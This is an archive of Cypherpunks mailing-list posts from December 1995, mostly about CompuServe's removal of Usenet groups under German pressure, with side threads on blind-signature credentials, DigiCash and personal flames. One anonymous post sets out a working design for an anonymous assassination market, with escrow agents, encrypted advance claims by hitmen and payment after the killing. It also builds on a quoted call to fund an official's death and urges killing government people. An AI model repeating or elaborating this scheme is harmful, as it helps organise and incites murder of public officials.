14.4Kbps From tallpaul at pipeline.com Sat Dec 30 09:00:20 1995 From: tallpaul at pipeline.com (tallpaul) Date: Sun, 31 Dec 1995 01:00:20 +0800 Subject: Zensoren ueber Alles Message-ID: <199512301554.KAA25650@pipe4.nyc.pipeline.com> On Dec 30, 1995 00:04:01, '"Ed Carp [khijol SysAdmin]" ' wrote: > >This "Tall Paul" fellow said: "Based on other news reports, I conclude that CompuServe lied in both areas." > >So? Companies lie all the time - the bigger the company, the bigger the >lie, in my experience. Companies are like governments - they will get >away with what they can until caught. Even then, they rarely stop - it >just goes undercover. > I was not presenting a political analysis behind CompuServe's actions, nor writing a simple personal opinion. I was presenting what I considered an factually correct objective observation of their actions. >> It did none of these things. It cut off all customers to an enormous number >> of groups. It inferrentially violated property rights (i.e. contracts) to >> customers promised internet access and now provided only a crippled version >> thereof. And it lied about the whole thing. > >Again, so? All that it will do is to drive people away from Compu$erve >into the arms of other service providers. Maybe some of them will even >figure out what a *real* ISP is... > How accurate is Carp's conclusion. Not very, in my opinion. The inaccuracy develops from the excessively narrow economic focus of Carp's thinking. It is an analysis that ignores the *social* implications of the CompuServe decision, treating the entire matter almost as something that would only interest CompuServe, Microsoft, AOL, and Prodigy stockholders. Among the other effects *already* visible, the decision has: 1) Led to an enormous amount of anti-net publicity by incompetent editors on the national news; 2) Furthered the development of hysteria and hysterical organizing; ("I don't care if it is censorship," said one mommy interviewed on the national news. "It is good for my children.") 3) Furthered the developmet of the right-wing "family rights" crowd; ("We need to follow Germany's lead," said one official from one of the "family rights" crowd interviewed on the national news.) 4) Promoted more dishonesty as a perfectly reasonable and perfectly acceptable means of engaging in social discourse; I predict it will also be used for additional attacks on issues of encryption, privacy, and anonymity. That is, I think we will see statements like "We need to be especially vigilant to make sure that the perverts are not smuggling banned material into the country via the internet. This means we have to block encryption, monitor user accounts even more carefully for potential perverts, etc. etc. Finally, I am not sure that Carp's economic analysis of the CompuServe decision is correct. The large internet service providers (LISP) form an oligopoly and, I think, the LISP all abandon hopes that they can become a monopoly. One form of oligopolistic co-operation is the creation of market niches within acceptable bounds of market share for each of the oligopolistic corporations. That is, CompuServe just launched a huge organizing effort to grab the "family" niche within the LISP market. I do not have the facts needed for a detailed quantfiable analysis of the LISP oligopoly (and frankly would not want to devote the time to such an analysis even if I did.) So I'll conclude here by stating that CompuServe's market share may increase because of their decision as parents move from the "family hostile" MSN/AOL/etc. to the "family friendly" CompuServe. If sexual hysteria is much stronger than views against censorship, for freedom of speech and inquiry, then we may see the other LISP groups emulate CompuServe to protect their oligopolistic market share. That is, if *significant* portions of AOL/MSN/etc. customers are motivated by sexual hysteria and start moving their accounts to CompuServe we will see AOL.MSN/etc. become equally "family friendly" to stop the customer shifts. --tallpaul From cg at bofh.toad.com Sat Dec 30 09:10:28 1995 From: cg at bofh.toad.com (Cees de Groot (none)) Date: Sun, 31 Dec 1995 01:10:28 +0800 Subject: Australian "calculatorcard" Message-ID: <199512301556.QAA31294@bofh.cdg.openlink.co.uk> Hi everybody, Yesterday, on UK Discovery, there was an item in the programme Beyond 2000 about an Australian card which implements a challenge-response protocol and can be used for banking, etcetera. Basically, you give your card number (over the phone), get a challenge number, enter your pin and the challenge, and then give the response. All in CC format... They plugged it as the ultimate identity-prover, so I'm kind of interested in what's behind. Now, I know that Discovery constantly repeats old stuff, so I'm not sure whether this is actually hot/new/... Can anybody provide me with pointers to more in-depth information about this device and the algorithm(s) behind it ? Thanks -- Cees de Groot, OpenLink Software 262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers] -- Any opinions expressed above might be mine. From nobody at alpha.c2.org Sat Dec 30 09:17:07 1995 From: nobody at alpha.c2.org (Anonymous) Date: Sun, 31 Dec 1995 01:17:07 +0800 Subject: NoneMurder, Inc. (was "Deterrence") Message-ID: <199512301603.IAA25153@infinity.c2.org> > In my essay, "Assassination Politics," I pointed out that it would be > relatively easy to deter such official-type actions if enough of us simply > said, "NO!" and denominated it in terms of dollars and cents. After all, > with four million Compuserve users, if they each were willing to donate a > penny to see this latter-day Fuhrer dead, that would be $40,000. (Pardon > me if I don't translate this into marks and other currencies.) > > In practice, of course, if such a system were in place, it is highly > unlikely that he would have even dared try to put pressure on Compuserve, > and Compuserve wouldn't have dared respond cooperatively to such > outrageous influence. In reality, four million compuserve users would not donate a penny each. It is likely that a few hundred people who felt strongly about the cause (and didn't mind a little bloodshed) might be willing to put up funds in amounts of around $20. Of course nobody would want to advertise under their real name that they have a contract out on some gummint agent. This would require the existance of a "Murder, Inc." as an escrow agent for the money. (There would likely be several such agents as it it unlikely people would trust just one.) Each person would give the escrow agent their contribution toward the elimination of the gummint troublemaker. Anyone who was willing to do the hit could post an encrypted claim, in advance, stating the time and date or method he plans to use, and where to send payment. Once the act was done, the hitman posts the decryption key so that everyone can see that he did it, and he collects the money. If after some reasonable amount of time, nobody takes out the gubmint asswipe, then the escrow agent returns all the money. It's quite feasable, and not especially difficult. The hardest thing is convincing people that the escrow agent is trustworthy, and to convince people that they really want to pay to have someone murdered. There is something a little chilling about that thought... On the other hand, the US government seems to feel that it's okay to kill people if they can get away with it (Ruby Ridge, Waco, that guy in California (forgot his name) who got shot on his ranch over bogus drug charges, etc.) So although murder is a Bad Thing(tm), the gubmint has set a very bad precedent in making it look "okay". Hence it becomes "okay" for people to do the same to them (for example the recent Oklahoma incident). It's okay for the government to randomly pick on innocent people to make a statement, hence it becomes okay to derail random trains to make a statement. (For the record, I am absolutely not defending what those people did to that Amtrak train in Arizona, just pointing out the psycology of it. If you're mad at the government then fucking kill some government people - What the hell did the amtrak passengers do to you?) Unfortunately it seems to be becoming okay to pick on random people to make an unrelated point (or just boost your ego) The government is using this tactic too, for example pick on a few porno collectors to demonstrate your "authority" in cyberspace. Same thing with picking on random gun owners to make a statement against RKBA. So maybe it will become popular to kill a random politician (or anyone) just to make a statement against the government. This is turning into a rant. I'll shut up now. From dlv at bwalk.dm.com Sat Dec 30 09:23:13 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 31 Dec 1995 01:23:13 +0800 Subject: Chinese Cypherpunk quote [NOISE] In-Reply-To: <199512300011.QAA16526@urchin.netscape.com> Message-ID: Corey Bridges writes: > To reply simply: Wrong -- the will of the people is as fickle as the wind. > Follow the will of the people, and you run your country by following fads. > Mob rule and all that. We're in deep trouble if we ever get a true democracy. One of the things Adolph Hitler and Bill Clinton have in common is that both were democratically elected leaders. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From adam at lighthouse.homeport.org Sat Dec 30 09:32:47 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sun, 31 Dec 1995 01:32:47 +0800 Subject: Compuserve is Not "Censoring": Look to Governments for the Cause In-Reply-To: Message-ID: <199512301700.MAA08304@homeport.org> This trend towords governments saying 'This might be illegal, we won't tell you' is very disturbing. Doug Barnes reported on it being the tactic of choice in forcing banks to fall in line & spy on their customers. Compuserve should be encouraged to get a ruling from the Barvarian/German government on the legality of the groups. (Does the EU provide freedom of speech protections, or simply freedom of inoffensive speech?) Also, how does this interact with the harmonization of publications laws with places such as the Netherlands? The EU can't be expected to thrive if each country has totally different publishing laws. Alternately, if there are cypherpunks who spend time in alt.config, we might create groups such as alt.intimate.stories, alt.intimate.bondage.duct-tape, etc. Ulf Moeller wrote: | This is today's page 1 article in the newspaper "die tageszeitung". | | The article "Zensur im Cyberspace" (censorship in cyberspace) | and the comment "Die Moral der Biederm=E4nner" are available | http://www.prz.tu-berlin.de/~taz until tomorrow. | | From the article (my translation): | | "The Bavarian department of public prosecution 'has left it to their | discretion' to take the 'necessary steps' on their own, to avoid | 'possible punishability of the management in Germany'. An advice that | CompuServe has followed although there is no kind of legal obligation | for it. Legally, it is still perfectly unclear if enterprises that | provide access to the Internet can be held responsible in any way for | the contents distributed there." -- "It is seldom that liberty of any kind is lost all at once." -Hume From nobody at c2.org Sat Dec 30 10:22:47 1995 From: nobody at c2.org (Anonymous User) Date: Sun, 31 Dec 1995 02:22:47 +0800 Subject: Is Dr Fred Cohen a Loon??? Message-ID: <199512301723.JAA00902@infinity.c2.org> Trolling for Flames(just another anonymous poster destroying the 'net) :) The Subject says it all... I believe Fred suffers from a severely inflated ego and suffers from the "false expert" syndrome detailed by various self-help orgs... what say you fred?? Another anon poster destroying the integrity of the net From tcmay at got.net Sat Dec 30 10:24:17 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 31 Dec 1995 02:24:17 +0800 Subject: Positive Implications of the Compuserve Moves Message-ID: At 3:54 PM 12/30/95, tallpaul wrote: >Among the other effects *already* visible, the decision has: > >1) Led to an enormous amount of anti-net publicity by incompetent editors >on the national news; On the positive side, I've heard some commentators (mainly on CNBC, and all-business news channel) ask pointed questions, and note that if every country imposes its own standards on the Internet/Usenet, then the implications are dire. The strong reaction developing against Compuserve could rebound to the benefit of killing off the Exon/Hyde language, in the best of all situations. (The Telecom Bill is still being thrashed out, and the CS controversy may remind folks of the implications of their actions.) >4) Promoted more dishonesty as a perfectly reasonable and perfectly >acceptable means of engaging in social discourse; I predict Compuserve will lose so much of what little respect they have eked out amongst Internet users that they will be eventually forced to provide the 200 dropped newsgroups, issue an apology, and probably retire or reassign a few executives as a show of public remorse. You heard it hear first. And many users are seeing the problems with monolithic, primitive ISPs like Compuserve, AOL, Prodigy, etc., and are moving to get "real" Net connections. This is a Good Thing. >Finally, I am not sure that Carp's economic analysis of the CompuServe >decision is correct. The large internet service providers (LISP) form an >oligopoly and, I think, the LISP all abandon hopes that they can become a LISP? (define CompuserveSucks (lambda () (display ".") (CompuserveSucks))) (CompuserveSucks) Recurses, foiled again! --Tim May We got computers, we're tapping phone lines, we know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 - 1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From ravage at ssz.com Sat Dec 30 10:36:07 1995 From: ravage at ssz.com (Jim Choate) Date: Sun, 31 Dec 1995 02:36:07 +0800 Subject: January meeting Message-ID: <199512300441.WAA01326@einstein> Hi all, Just a reminder that the next general meeting will be held on January 7, 1996 from 6-8pm at the Central Market HEB on N. Lamar at 42nd. We will be discussing further issues related to the video and setting a schedule of meetings and deadlines for various production points. Hope to see you folks there! Jim Choate From trei at process.com Sat Dec 30 10:44:02 1995 From: trei at process.com (Peter Trei) Date: Sun, 31 Dec 1995 02:44:02 +0800 Subject: CHU_chu Search Engines, Branded Communities Message-ID: <9512300206.AA12772@toad.com> riverrun John Young writes: > 12-29-95. FinTimes: > "Engine of the superhighway" muses on search engines and > branded communities, and how their convergence will > barb-wire lecher Tio Web from wild-legger Tia Juana. > CHU_chu I can't get much out of the second clause above. Much as I truely value John's notices of articles from the paper world, I sometimes wish he would not obfuscate his text. speaking for myself Peter Trei trei at process.com riverrun From tallpaul at pipeline.com Sat Dec 30 10:46:31 1995 From: tallpaul at pipeline.com (tallpaul) Date: Sun, 31 Dec 1995 02:46:31 +0800 Subject: Zensoren ueber Alles Message-ID: <199512300548.AAA02407@pipe8.nyc.pipeline.com> >From initial reports, the challenge to CompuServe did not come from the German government. It did not come form the German Parliament. It did not come form the German judiciary. It came from one (repeat one) prosecutor in one (repeat one) city. I also suspect the U.S. journalists who reported the news may not know the difference between a "prosecutor" and a "procurator." It is a significant differnce in many legal systems. (Not to slag U.S. journalists too hard because I myself don't know which of the two Germany has.) The news reports on New York City television focused exclusively on the "sexual" character of the banning, without directly mentioning that other groups were also banned. "But," wrote Jonathan Oatis of Reuter in an article available on the Clarinet news feed, "many more span a host of topics, including Barney the dinosaur of children's television, Estonian politics and the New York Yankees baseball team." Also included in the reports of news groups banned is the clari.news.sex feed containing articles routinely filed by the Associated Press and Reuter. It has also been reported that self-help recovery groups were banned because the groups also had the word "sex" in the name. (In order to save the victims it was necessary to destroy them!) How did the 11 o'clock news here in New York handle the story? Two of the three channels stated that CompuServe banned "chat rooms," not news groups. The third got it right and reported on internet groups. The two channels who spoke of the "chat room" ban also stated that the rooms were banned because they contained "explicit" sexual images or graphics "depicting" sexual topics. What can we infer? No single thing directly save for the inaccuracy of the reports. But certainly even national-level tv editors are not yet sufficiently informed about the internet to know the difference between chat rooms and news groups. I'd say that this level of ignorance rather impacts on their ability to do their job in a professional fashion. (It also points to our collective failure to adequately inform them.) Second, the editors -- whether under pressure of deadline, personal psychological bias, or more sinister things -- can't pick up the idea that the verbal ("chat") and the visual ("explicit" sexual images) are two different things. Third, the sexual hysteria of the editors themselves significantly erodes their ability to perform their jobs in an objective fashion. CompuServe also got off easy under initial press inquiry. One spokesman for the company announced they were required to do it. He also stated that there was no way to cut the German customers off from the groups will making the groups available to other CompuServe customers. Based on other news reports, I conclude that CompuServe lied in both areas. (BTW, this is the first time I recall using the word "lie" on any post to the cypherpunks list.) I also infer that CompuServe did not "roll over" on this issue. The evidence shows, I think, that CompuServe is merely using one German prosecutor (or procurator) as an excuse to implement their own desired and previously prepared policy. CompuServe had, I think, several actions open. First, if the news reports that it was not "forced" to do anything by the single German, it could simply not have done anything. Second, it could have appealed the decision by the prosecutor to the courts (or submitted accurate information to the procurator and demanded that he consider it.) Third, it could have narrowly targeted the banned groups to alt.binary groups dealing with sexual issues. Fourth, it could have easily used software to cut off the feed to Germany. It did none of these things. It cut off all customers to an enormous number of groups. It inferrentially violated property rights (i.e. contracts) to customers promised internet access and now provided only a crippled version thereof. And it lied about the whole thing. Interestingly, none of the classic cypher-nasties were behind CompuServe's decision. The "big statists" in Washington didn't tell CompuServe to do it. The "hell with private property rights" bureaucrats didn't force CompuServe to do it. Nor did the taxman. The taxmen historically rarely do; they do not seek to ban "sin;" they tax it. The Treasury Department's Bureau of Booze, Butts & Bazookas (aka Bureau of Alcohol, Tobacco, and Firearms) is not behind this country's anti-booze, anti-butt, or anti-bazooka movement. They just tax all three. (They may kill you if you buy, transfer, or manufacture your bazooka without paying the US$ 200 (?) excise tax, but they're not out there in the forefront of those pushing gun control.) Additional facts that will be forthcoming in the future will point, I believe, to two things behind CompuServe's decision. The two leading causes will, I predict, be: First, the growing abstract systemic fear in this society produced by a society in crisis. This is a fear unnaturally re-directed at things like PGP and anonymity by various political poo-bahs to both deflect the citizens' fears from real causes and to rechannel that fear into areas where the same poo-bahs can claim credit for doing the "something" in "something has to be done." Second, the growing sexual hysteria within large sections of the population that does not exist in an abstract form and is not being artifically rechanneled but rather appealled to. CompuServe, in a rather brilliant move, managed to handle both groups, and blame a foreign force to boot. But while brilliant tactically, I do not believe they will succeed in continuing their policy. --tallpaul From shamrock at netcom.com Sat Dec 30 10:53:39 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 31 Dec 1995 02:53:39 +0800 Subject: Zensoren ueber Alles Message-ID: At 10:54 12/30/95, tallpaul wrote: [On the CI$ issue] >I predict it will also be used for additional attacks on issues of >encryption, privacy, and anonymity. That is, I think we will see >statements like "We need to be especially vigilant to make sure that the >perverts are not smuggling banned material into the country via the >internet. This means we have to block encryption, monitor user accounts >even more carefully for potential perverts, etc. etc. Nothing new here. Pornography and the other Three Horsemen will be use to ban the spread of 'dangerous' thoughts on the Internet. This was clear years ago. Let me emphasize a few facts: o Non-GAK Encryption will be outlawed. o 'Immoral' texts and pictures will be banned. o The dissemination of 'dangerous ideas' will become a felony. At best, Cypherpunks can hope to provide the infrastructure that will allow an underground to communicate semi-securely. We are unable to stop the global tidal wave of fascism. Let's not waste our time on bemoaning the freedoms crushed in its path. We have more important work to do. -- Lucky Green PGP encrypted mail preferred. From jamesd at echeque.com Sat Dec 30 10:56:08 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 31 Dec 1995 02:56:08 +0800 Subject: (fwd) DigiCash licencing? Message-ID: <199512301815.KAA14002@blob.best.net> Jyri Kaljundi wrote: > Does anyone know about the terms and costs of licencing ecash software? I > have tried contacting DigiCash directly with these questions, but have > got no answers This experience (total lack of coherent response from Digicash) seems to be widespread, on many issues. The answer to your question has to be decided by DigiCash on a case by case basis, and they are not noted for thinking on their feet. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jya at pipeline.com Sat Dec 30 11:09:25 1995 From: jya at pipeline.com (John Young) Date: Sun, 31 Dec 1995 03:09:25 +0800 Subject: PLA_gue Germ Terrorism Message-ID: <199512301830.NAA05708@pipe4.nyc.pipeline.com> 12-30-95. To update the list of terrorist threats, the Wash Post reports on the purchase in May of bubonic plague germs by "white supremacist" Larry Wayne Harris, his bust by the FBI and germ teams, prosecutors amazement that possession of such deadly micro-organisms is not illegal, and the consequent plea bargain of wire fraud with probation. The article explains that possession of "terrorist" mites is not prohibited due to a legal loophole which allows scientific trade in wee supremacists. There are calls for outlawing the meat-eaters by closing the gap in the anti-terrorism bill before Congress. But scientists say how dare you spit in our nanodeath soup. It notes that offshore spread is Commerce regulated. BTW, why this story now about summer events? For the anti-terrorist bill, TLA-plague growth, any germ any? PLA_gue From gary at kampai.euronet.nl Sat Dec 30 11:18:16 1995 From: gary at kampai.euronet.nl (Gary Howland) Date: Sun, 31 Dec 1995 03:18:16 +0800 Subject: Massey, CEO of Compuserve, on Internet Message-ID: <199512301850.NAA17165@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Peter D. Junger wrote: > > One should also notice that Bavaria is only one state in the German > Federal Republic; this case is more like Texas investigating > Compuserve than the United States federal government investigating > Compuserve. Bavaria is the stronghold of what can properly be called > the (Catholic) Religious Right in Germany. It should also be noticed > that in general German publications and television seem to be less > constrained in publishing materials that in the United States would be > called ``indecent'' by some than are United States publications and > broadcasters. > In some areas they may be a tad more liberal, but in general they are not. They do indeed have laws preventing freedom of speech (especially with regard to right wing politics, the holocaust etc.) Somebody correct me if I'm wrong, but I believe that all German ISPs do not carry various political/controversial newsgroups such as alt.revisionism due to legal reasons. A more serious problem for those of us in EU countries is that the German government have influence on other EU states - only a week or two ago they tried to push through European wide legislation restricting freedom of speech. Gary - -- "If there be time to expose through discussion the falsehood and fallacies, to avert the evil by the processes of education, the remedy to be applied is more speech, not enforced silence." -- US Supreme Court Justive Louis Brandeis - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMOWKESoZzwIn1bdtAQEBQwGA1jg9rwAJgB/PlkzItUp4JOjScswcqxR5 hqSJK/rj2o6cNN7Z9OGVD8+9VMJi7BEp =XTJn -----END PGP SIGNATURE----- From goedel at cerebus.redweb.com Sat Dec 30 11:37:57 1995 From: goedel at cerebus.redweb.com (Dietrich J. Kappe) Date: Sun, 31 Dec 1995 03:37:57 +0800 Subject: Massey, CEO of Compuserve, on Internet In-Reply-To: Message-ID: <199512301926.NAA29572@cerebus.redweb.com> > Munich prosecutor Manfred Wick confirmed Friday that Bavarian state ^^^^^^ ^^^^^^^^ >police investigators searched CompuServe's networks and computers last >month for child pornography, but he would not say what they found. > "We didn't threaten them with charges," Wick said. Its worth mentioning that the state of Bavaria (Bayern) is the most conservative and one of the most Catholic provinces in Germany. There was an article in Zeit a few months ago about a division of the police investigating on-line crime, although at the time it was more BBS and Video Text related. As a former resident of Bavaria, I am not one bit surprised at these scare tactics. -- Dietrich Kappe | Red Planet http://www.redweb.com Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key 1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84 From tfs at vampire.science.gmu.edu Sun Dec 31 03:58:09 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Sun, 31 Dec 95 03:58:09 PST Subject: Massey, CEO of Compuserve, on Internet In-Reply-To: Message-ID: <9512311156.AA00347@vampire.science.gmu.edu> you said: |On Fri, 29 Dec 1995, Timothy C. May wrote: | |> Wow! I am watching the CEO of Compuserve being interviewed on CNBC, |>explaining how his company is "taking the high road by complying with the |>laws of Germany" in removing access to 200 Usenet groups. | |A blatant lie. | How this could ever be construed as "the high road" is beyond me. Censorship and fascism tend to go hand in hand, I suppose it should be no surprise to see this coming from de-dom. Can we just start calling them CompuCensor instead of Compuserve? Tim ________________________________________________________________ tfs at vampire.science.gmu.edu (NeXTmail, MIME) Tim Scanlon tfs at epic.org (PGP key aval.) crypto is good Digital Encryption Systems Inc. I own my own words From jimbell at pacifier.com Sat Dec 30 12:27:34 1995 From: jimbell at pacifier.com (jim bell) Date: Sun, 31 Dec 1995 04:27:34 +0800 Subject: last straw Message-ID: At 07:34 AM 12/30/95 -0800, you wrote: >I've decided to cancel my CrampuNerve account and send the weasels a msg to >telling them why. I encourage everyone here to do the same with your CI$ >account (if you still have one). These [insert colorful expletive here]s >only understand one thing: cold ca$h. Thus, the only effective way to send >them an indication of one's displeasure at their poor precedent-setting is >to vote with one's wallet. > >Any who are still unfortunate enough to rely on CI$ for Internet/Usenet >access are getting reamed price-wise anyway, not to mention suffering poor >reliability and now access, so maybe a few of them could also take this >opportunity to migrate to an ISP with some real "backbone." I don't have a CSERVE account, and never have. But yesterday, I called a friend (who has such an account) I talk to every two weeks or so. The conversation went something like this: "Hi Greg." "Hi Jim." "I suggest that you get rid of your Comp..." (he cuts me off in mid-sentence, anticipating the entire subject of the call) "I'm doing that as we speak, Jim" "...because they just..." (I continued the thought, but he cut me off again) "That's EXACTLY why I'm doing it, Jim." (mutual laughter as we realize the irony of the situation.) Somehow, I think Compuserve is going to get the message. From cp at proust.suba.com Sat Dec 30 12:33:56 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Sun, 31 Dec 1995 04:33:56 +0800 Subject: blind validation In-Reply-To: <199512300908.EAA07360@opine.cs.umass.edu> Message-ID: <199512302007.OAA00861@proust.suba.com> > I'm not convinced that your last point is true. It appears that the signed > Bobnet-access-number is still just a transferrable ticket. Charlie can > place an order with Bob, forward the Bobnet-access-number to Alice, wait for > Alice & Trent to do the blinding & signing tango, forward the signed Bobnet- > access-number to Bob, and get the goods from Bob. > > Charlie can't use the signed Bobnet-access-number to prove to Trent > that he's Alice. In fact, since it's unblinded, Charlie can't even prove > that he's linked to a particular validation performed by Trent. (If Alice > foolishly gave him the blinded version too, he could show that he shares > Alice's knowledge about this validation.) > I'm not convinced that your last point is true. It appears that the signed > Bobnet-access-number is still just a transferrable ticket. Charlie can > place an order with Bob, forward the Bobnet-access-number to Alice, wait for > Alice & Trent to do the blinding & signing tango, forward the signed Bobnet- > access-number to Bob, and get the goods from Bob. Yes and no. It is just a ticket, except that there are time constraints. If Alice doesn't respond in some reasonable time while the protocol is going on, Bob quits. (I didn't say that explicitly, my mistake.) Part of what I was trying to say, but didn't say well, is that Alice can *always* act as a proxy, ie., she can always get a file and give it to someone else. But Sam can't bust Bob if Alice gives the file away. He'll have to go after Alice. The whole point of the exercise is to convince Sam that Bob hasn't given away any files to minors or Europeans or whoever else Sam feels shouldn't have them. This puts a whole new spin on the situation, a different sort of attitude than we usually have when we're talking about crypto protocols. The entire ecash system has to have integrity. If someone figures out how to forge or double spend ecash, it doesn't do the bank any good to say, "We didn't do it, this person with an account did it." But we can't keep erotica out of the hands of minors, or home grown crypto out of the hands of Europeans. That means that from a certain point of the view, the system as a whole won't have integrity. But no system can have integrity, because Alice can always act as a proxy. The point is to set things up so that: 1. Alice can remain anonymous 2. Bob can keep Sam off his back 3. Sam has to admit that the system, imperfect as it is, is as good as other systems. (Alice can act as a proxy, but she could do that at a liquor store or a pornography shop also. If Alice had to give her ID, she could still give away the file.) The through the looking glass aspect of this is that from a practical standpoint, there's no real difference between Alice giving away her credentials and Alice acting as a proxy. But Sam foists the upon us the necessity of arguing what are almost semantic points. If Bob always gives the files to people Sam says are ok, then Bob won't go to jail. It is true that Alice could act as a beard for someone in the transaction, but in my opinion it's not unreasonable to claim that if she does she's acting as a proxy. The attacker still has to go to Alice and say, "give me this file", and Alice still has to agree and interact with Trent in the moment to make it work. Going back to the liquor store analogy, Alice can go into the liquor store with a kid, have the kid point to a bottle on the shelf, go to the register, and then buy it. But she can't give her ID away to the kid and let the kid go to the liquor store on his own. Either way the kid gets drunk, but if Alice can't give away her ID, Bob won't have to worry about losing his license. Alice, of course, has to watch out for Sam. > 3. is OK as long as Alice trusts Trent. The trick is selecting a Trent > trusted by both Alice and Sam ;) Very true. > > -Futplex > From dlv at bwalk.dm.com Sun Dec 31 05:40:15 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 31 Dec 95 05:40:15 PST Subject: anon.penet addresses in .sigs In-Reply-To: <199512311100.GAA18408@thor.cs.umass.edu> Message-ID: futplex at pseudonym.com (Futplex) writes: > The direct address is easier to use, especially for people whose mailers > don't allow them to add arbitrary email headers. Note that the ratio of I recall that anon.penet.fi can be used by those whose mailers don't allow them to add new headers -- the extra headers can be placed in at the top of the body and it'll recognize them. Likewise cypherpunk remailers let you add headers with ##. I've taught at least one extremely "non-technical" user to use the cypherpunks remailers successfully. > users of the various cypherpunk remailers to users of anon.penet is even > lower than the S/N ratio on this list in December. Like, negative????? :) > In certain parts of Usenet, many people routinely advertise addresses at > anon.penet (and similar services) in their .sigs (as Ed does) to make > pseudonymized replies as convenient as possible. This is not a new phenomenon My question was "why". I think I see the answer now. Thank you. Happy New Year! --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From Steve14571 at aol.com Sun Dec 31 06:15:34 1995 From: Steve14571 at aol.com (Steve14571 at aol.com) Date: Sun, 31 Dec 95 06:15:34 PST Subject: Massey, CEO of Compuserve, on Internet Message-ID: <951231091526_102864093@mail06.mail.aol.com> In a message dated 95-12-30 21:34:12 EST, accessnt at ozemail.com.au (Mark Neely) wrote: I assume that C$ is only filtering the newsfeed as it hits German shores? Please tell me they aren't denying access to these "banned" newsgroups for all users worldwide! This is exactly what they are doing, Mr. Neely. I am not familiar with CompuServe, as I have never used it. However, based on my understanding of how Usenet operates, it would be possible to write software and incorporate it into CompuServe software that would block German readers from the "obscene" newsgroups. CompuServe would rather score points with the mostly ignorant general public by saying that they are becoming more "family-oriented." I get my access through America Online, and I am afraid that these monolith online services (AOL, Delphi, Prodigy) will follow C$'s lead so they may also say they are "family-oriented." I will no longer send mail to addresses that end with "compuserve.com." If AOL decides to become family oriented, I will look for other ways to connect to the net. From fc at all.net Sat Dec 30 14:47:42 1995 From: fc at all.net (Fred Cohen) Date: Sun, 31 Dec 1995 06:47:42 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: <199512301723.JAA00902@infinity.c2.org> Message-ID: <9512302200.AA14470@all.net> > The Subject says it all... I believe Fred suffers from a severely inflated > ego and suffers from the "false expert" syndrome detailed by various > self-help orgs... what say you fred?? People who call me a "false expert" are so afraid of damaging their own reputation by doing so that they have to do it anonymously. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From frissell at panix.com Sun Dec 31 06:49:51 1995 From: frissell at panix.com (Duncan Frissell) Date: Sun, 31 Dec 95 06:49:51 PST Subject: Compuserve *hasn't* banned newsgroups Message-ID: <2.2.32.19951231145010.008c9658@panix.com> So I'd heard that CompuServe had banned access to all those naughty newsgroups including my favorite alt.binaries.erotic.senior-citizens. Could this be true? I fired up my CompuServe Internet Dialer (the PPP software packaged with WinCim and logged on to the nets. Sure enough. The popular binaries groups were missing from news.compuserve.com. But not to be deterred... I grabbed a copy of the Free Agent newsreader: http://www2.interpath.net/forte/agent/freagent.htm ftp.forteinc.com/pub/free_agent/fagent10.zip I grabbed the latest list of open NNTP Servers from: http://dana.ucc.nau.edu/~jwa/open-sites.html I pointed my copy of Free Agent at CPCNET's open news server (198.70.185.5) and grabbed a list of groups sure enough, there were the seasoned citizens in all their glory. And I was checking out those binaries via CompuServe. Don't tell the Bavarians. DCF From jya at pipeline.com Sat Dec 30 14:49:55 1995 From: jya at pipeline.com (John Young) Date: Sun, 31 Dec 1995 06:49:55 +0800 Subject: 1OV_ert Net Tap 1 Message-ID: <199512301147.GAA20962@pipe4.nyc.pipeline.com> 12-30-95. NYP: Aided by the first court-approved Net wiretap, via Compuservile, three people have been jailed for an international plot to sell cel-tel cheaters. 1OV_ert From erc at dal1820.computek.net Sat Dec 30 14:58:29 1995 From: erc at dal1820.computek.net (Ed Carp [khijol SysAdmin]) Date: Sun, 31 Dec 1995 06:58:29 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: <9512302200.AA14470@all.net> Message-ID: <199512302211.QAA14605@dal1820.computek.net> -----BEGIN PGP SIGNED MESSAGE----- > > > The Subject says it all... I believe Fred suffers from a severely inflated > > ego and suffers from the "false expert" syndrome detailed by various > > self-help orgs... what say you fred?? > > People who call me a "false expert" are so afraid of damaging their own > reputation by doing so that they have to do it anonymously. OK, I'll do it. Fred, sometimes your pontifications make as little sense as you arrogantly signing "Dr. Fred Cohen" in your name field. - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/digital pager 800/558-3408 SkyPager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi "Past the wounds of childhood, past the fallen dreams and the broken families, through the hurt and the loss and the agony only the night ever hears, is a waiting soul. Patient, permanent, abundant, it opens its infinite heart and asks only one thing of you ... 'Remember who it is you really are.'" -- "Losing Your 